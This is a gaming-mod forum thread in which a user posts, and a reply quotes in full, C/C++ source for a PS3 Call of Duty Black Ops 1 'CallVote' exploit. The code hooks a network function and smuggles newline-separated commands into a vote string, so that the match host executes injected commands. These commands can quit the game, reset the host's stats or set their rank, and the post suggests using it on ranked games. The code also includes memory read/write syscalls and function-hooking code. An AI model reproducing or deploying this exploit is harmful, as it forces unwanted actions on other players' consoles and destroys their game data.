THREAD: Bo1 Non-Host Infection A.K.A. CallVote Exploit
  1. 09-26-2018, 03:19 PM
    -JM-'s Avatar
    -JM-
    Space Ninja
    -JM-'s Avatar
    -JM-
    Space Ninja
    804
    Posts
    8,104
    Reputation
    Mar 2012
    NextGenUpdate
    If all clients stats ain't released here's the alternative =D

    Spoiler:


    /*Bo1 Nonhost Infection A.K.A. CallVote Exploit
    Credits:
    https://old.zenhax.com/quake3-engine-callvote-bug-t686.html

    Luigi for documenting Quake 3 callvote Exploite
    01cedricv2 for showing Quake documentation to Jo-Milk
    and Jo-Milk for porting to PS3

    This can be ported on Bo2 [Tested] and Other cods
    This infects the host once Vote passes to do so
    you need to join your friend in a private match
    He'll need to be the host:
    1st way is:
    you tell him to go spectator and you spawn in and use cbuf_AddText
    2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host

    this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
    */

    #define TOC 0x0072DCE8//1.13
    int var = 1;//change this value to change the infection type

    int cbuf[] = { 0x00399CC8, TOC };
    void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;

    void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
    __nop();
    __nop();
    __nop();
    __nop();
    __nop();
    __nop();
    __nop();
    }

    void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
    {
    if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//if dont work try pszBuffer
    {
    switch (var)
    {
    case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//RANK 50 not fully done
    case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//kick host to XMB
    case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//Derank
    default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;
    }

    }
    else
    {
    MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
    }
    }
    /*basically we replaced ';' by '\n' in the hook making the host execute the whole line of dvars instead of one
    but in cbuf_AddText you want ';' to avoid the game from executing the line of dvars on yourself*/

    /*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
    cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");

    /*--------------------------------------------------Extra----------------------------------------------------------------------*/
    //read write syscalls
    int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
    {
    system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    return_to_user_prog(int32_t);
    }

    template<typename T>
    int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
    {
    return sys_dbg_read_process_memory(address, &data, size);
    }

    int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
    {
    system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    return_to_user_prog(int32_t);
    }

    template<typename T>
    int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
    {
    return sys_dbg_write_process_memory(address, &value, size);
    }

    void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
    {
    uint32_t normalFunctionStub[8], hookFunctionStub[4];
    sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
    normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);
    normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);
    normalFunctionStub[6] = 0x7D6903A6;
    normalFunctionStub[7] = 0x4E800420;
    sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);
    hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);
    hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);
    hookFunctionStub[2] = 0x7D6903A6;
    hookFunctionStub[3] = 0x4E800420
    sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
    }

    HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);




    Spoiler:

    You must login or register to view this content.


    PLEASE keep the credits how it is
  2. The Following 2 Users Say Thank You to -JM- For This Useful Post:

    ,

  3. 09-26-2018, 08:28 PM
    131
    Posts
    32,218
    Reputation
    Mar 2016
    NextGenUpdate
    Niceeeeeeeeeee Happy
  4. 09-28-2018, 10:37 AM
    S63's Avatar
    S63
    Space Ninja
    S63's Avatar
    S63
    Space Ninja
    841
    Posts
    6,275
    Reputation
    Jan 2016
    NextGenUpdate
    Originally Posted by JM View Post
    If all clients stats ain't released here's the alternative =D

    Spoiler:


    /*Bo1 Nonhost Infection A.K.A. CallVote Exploit
    Credits:
    https://old.zenhax.com/quake3-engine-callvote-bug-t686.html

    Luigi for documenting Quake 3 callvote Exploite
    01cedricv2 for showing Quake documentation to Jo-Milk
    and Jo-Milk for porting to PS3

    This can be ported on Bo2 [Tested] and Other cods
    This infects the host once Vote passes to do so
    you need to join your friend in a private match
    He'll need to be the host:
    1st way is:
    you tell him to go spectator and you spawn in and use cbuf_AddText
    2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host

    this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
    */

    #define TOC 0x0072DCE8//1.13
    int var = 1;//change this value to change the infection type

    int cbuf[] = { 0x00399CC8, TOC };
    void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;

    void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
    __nop();
    __nop();
    __nop();
    __nop();
    __nop();
    __nop();
    __nop();
    }

    void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
    {
    if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//if dont work try pszBuffer
    {
    switch (var)
    {
    case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//RANK 50 not fully done
    case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//kick host to XMB
    case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//Derank
    default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;
    }

    }
    else
    {
    MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
    }
    }
    /*basically we replaced ';' by '\n' in the hook making the host execute the whole line of dvars instead of one
    but in cbuf_AddText you want ';' to avoid the game from executing the line of dvars on yourself*/

    /*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
    cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");

    /*--------------------------------------------------Extra----------------------------------------------------------------------*/
    //read write syscalls
    int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
    {
    system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    return_to_user_prog(int32_t);
    }

    template<typename T>
    int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
    {
    return sys_dbg_read_process_memory(address, &data, size);
    }

    int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
    {
    system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    return_to_user_prog(int32_t);
    }

    template<typename T>
    int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
    {
    return sys_dbg_write_process_memory(address, &value, size);
    }

    void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
    {
    uint32_t normalFunctionStub[8], hookFunctionStub[4];
    sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
    normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);
    normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);
    normalFunctionStub[6] = 0x7D6903A6;
    normalFunctionStub[7] = 0x4E800420;
    sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);
    hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);
    hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);
    hookFunctionStub[2] = 0x7D6903A6;
    hookFunctionStub[3] = 0x4E800420
    sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
    }

    HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);




    Spoiler:

    You must login or register to view this content.


    PLEASE keep the credits how it is


    Reported haxor nub. Jokes good work bish Winky Winky